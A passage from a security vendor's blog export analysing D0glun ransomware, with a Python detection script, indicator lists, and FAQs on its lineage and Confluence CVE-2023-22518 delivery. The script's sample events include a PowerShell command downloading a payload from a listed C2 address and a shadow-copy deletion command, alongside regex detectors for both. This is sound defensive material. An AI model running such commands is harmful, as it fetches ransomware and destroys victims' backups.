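constructed for the demo, and the pipe-separated event layout
(timestamp|host|image|command line|sha256|destination ip) is an assumed
export format, not a Sysmon or EDR schema.
"""
import re
from dataclasses import dataclass

# Atomic indicators from the post. Cheap to match, cheap for the actor to
# change: a rebuilt sample gets a new hash, a new server a new IP.
SHA256_IOCS = {
    "3eb7f1dd0274bd4ffcdf463876ab547503f9e6120db22c5e1923fe16cab71b50",
    "a8df7571e871d22f13ba3eb376eddd1f73ce241d24caa878494e1805219b342a",
    "d6d55a8fbd1c603719fe611e572e2431512e7063c44896f705524dab66234d45",
    "f549ae8d509dab97f2d8b12ecf344c72ab2e715b2667e78d8fdd892eb6a459de",
    "bec9d2dcd9565bb245f5c8beca4db627390bcb4699dd5da192cc8aba895e0e6a",
}
C2_IPS = {"193.176.179.41", "193.43.72.11", "45.145.6.112"}
PAYLOAD_NAMES = {"svcprvinit.exe"}

# Both renaming layouts the post lists: ".@D0glun@<ext>" and
# "<ext>.@zero_d0glun_<ext>". Case-insensitive because the post shows the
# marker as both @D0glun@ and @d0glun@.
ENCRYPTED_NAME_RE = re.compile(r"\.@(?:d0glun@|zero_d0glun_)", re.IGNORECASE)

# Behavioural rules keyed to the execution flow (ATT&CK T1490, T1059.001).
# These fire on what the sample does, so they outlive a re-hashed build.
SHADOW_DELETE_RE = re.compile(
    r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.IGNORECASE)
PS_DOWNLOAD_RE = re.compile(
    r"powershell.*\b(?:downloadfile|downloadstring|invoke-webrequest|iwr)\b",
    re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str   # ATT&CK ID; T1105 (Ingress Tool Transfer) is our own mapping
    host: str
    detail: str


def parse_event(line: str) -> dict:
    """Split one event. The command line may itself contain '|', so the
    three leading and two trailing fields are taken from the ends."""
    ts, host, image, rest = line.rstrip("\r\n").split("|", 3)
    cmdline, sha256, dest_ip = rest.rsplit("|", 2)
    return {"ts": ts, "host": host, "image": image, "cmdline": cmdline,
            "sha256": sha256.lower(), "dest_ip": dest_ip}


def scan_events(lines) -> list:
    """Apply every rule to every event; one event may yield several findings."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        image_name = ev["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if ev["sha256"] in SHA256_IOCS:
            findings.append(Finding("known_sample_hash", "T1486", ev["host"], ev["sha256"]))
        if image_name in PAYLOAD_NAMES:
            findings.append(Finding("payload_process_name", "T1486", ev["host"], ev["image"]))
        if ev["dest_ip"] in C2_IPS:
            findings.append(Finding("c2_address", "T1105", ev["host"], ev["dest_ip"]))
        if SHADOW_DELETE_RE.search(ev["cmdline"]):
            findings.append(Finding("shadow_copy_deletion", "T1490", ev["host"], ev["cmdline"]))
        if PS_DOWNLOAD_RE.search(ev["cmdline"]):
            findings.append(Finding("powershell_download_cradle", "T1059.001", ev["host"], ev["cmdline"]))
    return findings


def find_encrypted_names(names) -> list:
    """File names carrying either D0glun extension pattern."""
    return [n for n in names if ENCRYPTED_NAME_RE.search(n)]


# Constructed events: one benign, then the chain the post describes
# (PowerShell fetch from a listed C2, payload execution, shadow deletion).
SAMPLE_EVENTS = [
    r"2025-04-10T09:12:01Z|WS-042|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs|0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c4b5a69788796a5b4c3d2e1f0|-",
    r"2025-04-10T09:12:44Z|WS-042|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://193.176.179.41/svcPrvinit.exe','C:\Users\Public\svcPrvinit.exe')|9b8a7c6d5e4f30211203f4e5d6c7a8b99b8a7c6d5e4f30211203f4e5d6c7a8b9|193.176.179.41",
    r"2025-04-10T09:13:02Z|WS-042|C:\Users\Public\svcPrvinit.exe|svcPrvinit.exe|a8df7571e871d22f13ba3eb376eddd1f73ce241d24caa878494e1805219b342a|-",
    r"2025-04-10T09:13:05Z|WS-042|C:\Windows\System32\vssadmin.exe|vssadmin delete shadows /all /quiet|5c7a9e1b3d2f4068a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718|-",
]
SAMPLE_FILES = ["budget.xlsx", "budget.xlsx.@D0glun@xlsx",
                "scan.pdf.@zero_d0glun_pdf", "ntoskrnl.exe"]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.technique}] {f.rule} on {f.host}: {f.detail}")
    print("encrypted:", find_encrypted_names(SAMPLE_FILES))
```

<p>The behavioural rules are the ones worth keeping: a re-hashed build or a new server defeats the hash and IP sets immediately, while deleting shadow copies and pulling a payload with PowerShell are steps the sample cannot skip. Tune PS_DOWNLOAD_RE against your own administration scripts before alerting on it, since legitimate deployment tooling in many environments matches the same verbs.<\/p>
<p>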
Its emergence in 2025 and the recent use of CVE-2023-22518 show how threat actors recycle and rework existing ransomware code rather than write new families from scratch. Attribution remains open: the Chinese-language artefacts and contact channels point one way, while a suggested but unconfirmed link to North Korean actors rests only on TTP overlaps seen in other campaigns.<\/p>\r\n\r\n<p>Organizations must maintain strong security postures, implement comprehensive backup strategies, and deploy modern endpoint protection solutions like <a href=\"https:\/\/gridinsoft.com\/antimalware\">GridinSoft Anti-Malware<\/a> to defend against these evolving threats. For additional protection against online threats, consider using the <a href=\"https:\/\/gridinsoft.com\/website-reputation-checker\">Website Reputation Checker<\/a> to verify the safety of web resources before access.<\/p>\r\n\r\n<div class=\"faq-section\">\r\n  <div itemscope itemtype=\"https:\/\/schema.org\/FAQPage\">\r\n    <div itemscope itemprop=\"mainEntity\" itemtype=\"https:\/\/schema.org\/Question\">\r\n      <h3 itemprop=\"name\">Is D0glun ransomware targeting specific industries?<\/h3>\r\n      <div itemscope itemprop=\"acceptedAnswer\" itemtype=\"https:\/\/schema.org\/Answer\">\r\n        <div itemprop=\"text\">\r\n          <p>Yes, D0glun primarily targets manufacturing, healthcare, and business services sectors. Most infections have been reported in North America and Europe, but the ransomware has global reach including South America, Africa, and Asia. Organizations in these industries should implement enhanced security measures including offline backups, network segmentation, and advanced endpoint protection. 
The recent campaign targeting Confluence servers has particularly affected organizations that haven&#8217;t patched CVE-2023-22518.<\/p>\r\n        <\/div>\r\n      <\/div>\r\n    <\/div>\r\n    \r\n    <div itemscope itemprop=\"mainEntity\" itemtype=\"https:\/\/schema.org\/Question\">\r\n      <h3 itemprop=\"name\">Can files encrypted by D0glun be recovered without paying the ransom?<\/h3>\r\n      <div itemscope itemprop=\"acceptedAnswer\" itemtype=\"https:\/\/schema.org\/Answer\">\r\n        <div itemprop=\"text\">\r\n          <p>Currently, no free decryption tool exists for D0glun ransomware. The most reliable recovery method is restoring from clean backups that were disconnected or stored separately from the infected system. Other potential recovery options include checking for Windows Shadow Volume Copies (if not deleted by the ransomware) or previous versions in cloud storage services. Security experts strongly advise against paying the ransom, as payment does not guarantee file recovery and finances criminal operations. The AES-256 encryption with RSA-2048 key protection makes brute-force decryption computationally infeasible.<\/p>\r\n        <\/div>\r\n      <\/div>\r\n    <\/div>\r\n    \r\n    <div itemscope itemprop=\"mainEntity\" itemtype=\"https:\/\/schema.org\/Question\">\r\n      <h3 itemprop=\"name\">What is the relationship between D0glun and earlier ransomware variants?<\/h3>\r\n      <div itemscope itemprop=\"acceptedAnswer\" itemtype=\"https:\/\/schema.org\/Answer\">\r\n        <div itemprop=\"text\">\r\n          <p>D0glun is directly related to the Babuk and Cheng Xilun ransomware families, following the lineage: Babuk \u2192 Cheng Xilun \u2192 D0glun. Technical analysis confirms similarities in code structure, encryption methods (AES-256), execution patterns, and ransom note formats. 
Cheng Xilun first appeared in April 2020, while D0glun emerged in January 2025, suggesting either the return of the original threat actor under a new alias or a different individual with access to the Cheng Xilun codebase. The main change is in delivery: D0glun campaigns now exploit Confluence servers through CVE-2023-22518.<\/p>\r\n        <\/div>\r\n      <\/div>\r\n    <\/div>\r\n    \r\n    <div itemscope itemprop=\"mainEntity\" itemtype=\"https:\/\/schema.org\/Question\">\r\n      <h3 itemprop=\"name\">How does D0glun exploit the Confluence vulnerability?<\/h3>\r\n      <div itemscope itemprop=\"acceptedAnswer\" itemtype=\"https:\/\/schema.org\/Answer\">\r\n        <div itemprop=\"text\">\r\n          <p>D0glun exploits CVE-2023-22518, an improper authorization vulnerability in Confluence Data Center and Server that lets an unauthenticated attacker reset the instance and create administrator accounts. With administrative access, the attackers run PowerShell commands to download and execute the ransomware payload, typically named &#8220;svcPrvinit.exe&#8221;, from their command and control servers. Exploitation of the flaw in the wild was reported within days of its disclosure on 31 October 2023, by other ransomware operators first; D0glun adopted it in 2025. Beyond patching, administrators should check Confluence for administrator accounts they did not create and for an unexpected restore-from-backup event, since the exploit path resets the instance to gain that access, and should segment the server so it cannot reach backup or file servers directly.<\/p>\r\n        <\/div>\r\n      <\/div>\r\n    <\/div>\r\n  <\/div>\r\n<\/div>","protected":false},"excerpt":{"rendered":"<p>D0glun Ransomware: Technical Analysis and Protection Guide D0glun ransomware emerged in January 2025 as a new crypto-ransomware variant with direct links to the Babuk and Cheng Xilun ransomware families. This sophisticated threat encrypts files using AES-256 encryption, appends the &#8220;.@D0glun@&#8221; extension to compromised files, and demands Bitcoin payment for decryption. 
This technical analysis explores D0glun&#8217;s [&hellip;]<\/p>\n","protected":false},"author":14,"featured_media":30624,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17],"tags":[619,55],"class_list":{"0":"post-30605","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"tag-cybersecurity","9":"tag-ransomware"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/04\/GS_BLOG_D0glun-Ransomware-The-Chinese-Language-Threat-Locking-Files-Worldwide_1280x674.webp","author_info":{"display_name":"Daniel Zimmermann","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/daniel\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/30605","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/14"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=30605"}],"version-history":[{"count":29,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/30605\/revisions"}],"predecessor-version":[{"id":30715,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/30605\/revisions\/30715"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/30624"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=30605"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=30605"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/g
ridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=30605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}